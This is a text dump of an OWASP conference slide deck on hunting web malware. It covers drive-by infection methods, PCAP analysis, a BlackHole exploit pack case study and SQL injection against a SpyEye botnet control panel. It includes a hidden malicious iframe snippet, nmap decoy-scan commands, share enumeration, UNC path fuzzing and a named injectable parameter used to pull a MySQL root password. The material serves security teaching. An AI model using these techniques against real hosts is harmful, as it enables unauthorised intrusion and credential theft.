Cigital Inc. for supporting our talk.
OWASP 2
3. About Us
Aditya K Sood
Founder , SecNiche Security
Independent Security Consultant, Researcher and Practitioner
Worked previously for Armorize, Coseinc and KPMG
Active Speaker at Security conferences
Written Content – ISSA/ISACA/CrossTalk/HITB/Hakin9/Elsevier NES|CFS
LinkedIn : http://www.linkedin.com/in/adityaks
Website: http://www.secniche.org | Blog:
http://secniche.blogspot.com | @AdityaKSood
PhD Candidate at Michigan State University
Dr. Richard J Enbody
Associate Professor, CSE, Michigan State University
Since 1987, teaching computer architecture/ computer security /
mathematics
Website: http://www.cse.msu.edu/~enbody
Co-Author CS1 Python book, The Practice of Computing using Python.
Patents Pending – Hardware Buffer Overflow Protection
OWASP 3
4. This talk is all about ……………
Malware Hunter (Good Hacker)
=
Penetration Testing
+
Web Security
+
Malware Analysis
OWASP 4
5. Agenda
Malware Paradigm – The State of Online World
Reality of Browsers
Browser Malware Taxonomy
Website Infection – Strategies used by Attackers
Website Traffic Analysis and Dumps
Methodology
Hunting Web Malware
Case Study 1 BlackHole Exploit Pack
Case Study 2 SpyEye Command and Control Take Down
Conclusion
OWASP 5
14. Website Infections – Malware Kicking
Finest Malware Infection Attacks
Iframe Injections ( Hidden + Unhidden)
– <iframe src =“” width=0 height=0 />
» Obfuscated hyperlinks to malicious files
» Malvertisements ( on fire nowadays)
Rogue .JS / .SWF
– <script src =“”/> | <object /> | <embed />
» Obfuscated scripts are the best choice
Compromising Servers
– Exploiting web virtual hosting
– Open Relay Server : sending spams with malicious links
– FTP Servers – Hacking credentials to update website files
– Database Servers – Persistent SQL injections / XSS Bugs
» Mass SQL injections on rise
Server Side Redirects (Persistent)
– Injecting malicious redirects in the web server configuration files 14
OWASP
15. Drive By Downloads – The Evil Reaction
Complete Details
– Victim browser is forced to visit infected website
– Iframe redirects browser to the EXPLOIT POINT (Exploit Hub)
– Exploit is served by fingerprinting browser environment
– Browser is exploited successfully
– Exploit point silently asks for the malware from the malicious
domain
» It can be self driven
– Malware is downloaded into system and automatically installed
OWASP 15
16. Drive By Cache – Holy Crap !
What is it ?
– Brother of Drive by Download Attacks. Is it ?
– More efficient way to bypass anti virus protections .
Drive by Cache / Drive by Downloads
– Very less variations have been noticed ( Drive By Cache)
– However, the infections are still in the wild and some of the
traces have been noticed
– Lot more to research over this attack but it has been initialized
already
– Reference: http://blog.armorize.com/2011/04/newest-adobe-
flash-0-day-used-in-new.html
OWASP 16
17. Website Malware Scanning – Cloud in Action
URL Dissection
Google Safe Browsing
– User-Agent (Browser Specific)/ DNS Blacklisting
– Past history of malware specific domains
Online Web
Malware
Scanners
Blacklisted URL’s Suspicious URL’s
Malware URL’s Clean URL’s
OWASP 17
19. Hunting Web Malware
Required Techniques and Tactics
Detailed understanding of different malware taxonomies
– The way malware enters into system from web
– Example: Malvertisements, Drive by Download attacks.
Categorization and Classification of malware is important
– Explicitly defines the malware working
– Defines the exact target to hunt
Understanding of Browser exploitation in detail
– Malware infecting various component of browsers
Web attacks and defenses
– Latest attack developments in the field of web
Penetration Testing (System Level) is the key to success
– Hard to imagine to hunt malware without reverse
hacking
OWASP 19
20. Pattern Detection – Google in Action
Detecting Live Targets
Search for specific patterns using Google
– Iframe patterns / strings/ malware domain names etc
OWASP 20
22. Dissecting Traffic Dumps and Analysis
Malware Traffic - PCAP Files
Raw dumps of captured packets
Provides information about traffic
– Ingress/Egress traffic
Information about the DNS Servers, IP Addresses
– Malicious executable served by the malicious domain
Protocol abuse
Extracting Malware (Executables/ Binaries)
WireShark – follow TCP/UDP stream
Dump data and edit with hex editor
Verifying the PE headers (specially MZ)
Rebuild the files for static and behavioral analysis
OWASP 22
24. Dissecting Traffic Dumps and Analysis
What Else than WireShark ?
Xplico
Scapy (Network – Swiss Army Knife)
OWASP 24
25. Dissecting Traffic Dumps and Analysis
Walking through the Process (Generic)
Step 1 - Applying filters in WireShark ( to remove unwanted
traffic)
» http://media.packetlife.net/media/library/13/Wireshark_Dis
play_Filters.pdf
Step 2 - Create the requisite PCAP files
» Use rdpcap() / sniff(offline=“”) (Scapy) to walkthrough
PCAP files
» Pdfdump/Psdump to make graphical output
Step 3 - Perform data operations (Scapy)
» Example: Writing first 5 bytes file_handle(pkt.load[5:])
» Other required data operations
Step 4 – Automated mining of PCAP files
» Use Network Miner and Xplico
OWASP 25
26. Extracting Executables from HTTP/HTTPS Traffic
TCP Session Stream Analysis
Reconstructing the TCP session stream
Scrutinize the content present in the TCP session
Malware binaries are present as raw/encoded data
Verifying the HTTP/HTTPS end points to collect all data
What to Look For ?
Find the starting point of TCP communication
Follow the TCP session stream
– WireShark does that for you.
Walkthrough the raw data.
– Search for two byte header MZ ($4D5A in hex) which begins
at a certain offset to trace the PE
– Dump the binary as raw output. Avoid encodings.
OWASP 26
29. Case Study – BlackHole Exploit Pack - Hunt
BlackHole Exploit Pack
One of the frivolous used exploit pack
Used extensively for spreading malware
Exploits browser and plugin vulnerabilities
Collaboratively used with botnets to spread malware
BlackHole – Spreading Infection
A malicious link is served through spams
Social engineering to force victims to visit malicious links
Manipulating social networking capabilities
Spreading scams and tricking victims to work it out
Note: This case study is an outcome of real time
hunting of web malware in a university network.
OWASP 29
30. Case Study – BlackHole Exploit Pack - Hunt
Understanding the Environment
A malicious website was hosted by the attacker
Utilized a zombie machine to host a web server
Fake emails were pushed in legitimate networks
– Malicious link was injected into it
– Malicious website hosted a web page with link to malicious
domain
Malicious iframe was detected and deobfuscated as
<iframe src="http://malware/phx/index.php"
width="1" height="1" frameborder="0“></iframe>
“index.php” fingerprinted the browser (version / plugins)
Exploit was served based on the environment
OWASP 30
31. Case Study – BlackHole Exploit Pack - Hunt
Exploit Serving
“index.php” found the installed JAVA to be vulnerable
It exploited JAVA SMB vulnerability and started throwing
the requisite exploit for it
ALERT !
– JAVA SMB exploit requires an SMB server to be installed on the
domain or subdomain to include the exploit through UNC path
Mapping the IP and NMAP scan was initiated
– Decoy Scan and IP Spoofing scans are always the best
nmap -P0 -A -T4 -sS blackhole_host -D 112.123.124.111 -p 445
Starting Nmap 5.51 ( http://nmap.org ) at 2011-04-06 13:07 Eastern Daylight Time
PORT STATE SERVICE VERSION
445/tcp open netbios-ssn Samba smbd 3.X
Running: Linux 2.6.X
OS details: Linux 2.6.17 - 2.6.35
Network Distance: 1 hop
Host script results:
|_, NetBIOS user: , NetBIOS MAC:
|_smbv2-enabled: Server doesn't support SMBv2 protocol
OWASP 31
32. Case Study – BlackHole Exploit Pack - Hunt
Exploit Serving
“new.avi” file was served as an exploit
Gotcha !
– SMB server was configured and serving exploit
» Hard to think whether the usermode security is applied
» SMB usermode = {username, password} required
So What – Shared mode is configured
– Default IPC$ share was available
E:audit>enum -P blackhole_host
server: blackhole_host
setting up session... success.
password policy:
min length: 5 chars
min age: none
max age: none
lockout threshold: none
lockout duration: 30 mins
lockout reset: 30 mins
cleaning up... success.
OWASP 32
33. Case Study – BlackHole Exploit Pack - Hunt
Verifying the Facts
The server was not browseable
Fuzzing the UNC path as follows
• blackhole_hosthomenew.avi
• blackhole_hostusrnew.avi
• blackhole_hosthomesmbnew.avi [ Gotcha]
• blackhole_hostusrsmbnew.avi
SMB server must be configured with following metrics
[global]
security = share
[smb]
comment = smb
path = /home/smb
public = yes
browseable = no
writeable = no
guest ok = yes
OWASP 33
34. Case Study – BlackHole Exploit Pack - Hunt
At Last
We were also able to crack the SMB login credentials to take
control over the server.
OWASP 34
35. Case Study – Botnet C&C SQL Injection
SpyEye Botnet C&C Target
Exploiting the SQL injection to take control of
Fetch the target using abuse.ch service
OWASP 35
36. Case Study – Botnet C&C SQL Injection
SpyEye Botnet C&C Target
Vulnerability lies in “ frmcp0/frm_findrep_sub2.php?id="
Getting the version number
OWASP 36
37. Case Study – Botnet C&C SQL Injection
SpyEye Botnet C&C Target
Vulnerability lies in “ frmcp0/frm_findrep_sub2.php?id="
Getting the database
OWASP 37
38. Case Study – Botnet C&C SQL Injection
SpyEye Botnet C&C Target
Vulnerability lies in “ frmcp0/frm_findrep_sub2.php?id="
Getting the MySQL root password
OWASP 38
39. Conclusion
For Rigorous Web Malware Hunting
Robust penetration testing skills required
Understanding of
– Malware infection framework
– Working of exploit serving mechanisms
– Detailed web security knowledge with all types of attacks
At last, think like an attacker
OWASP 39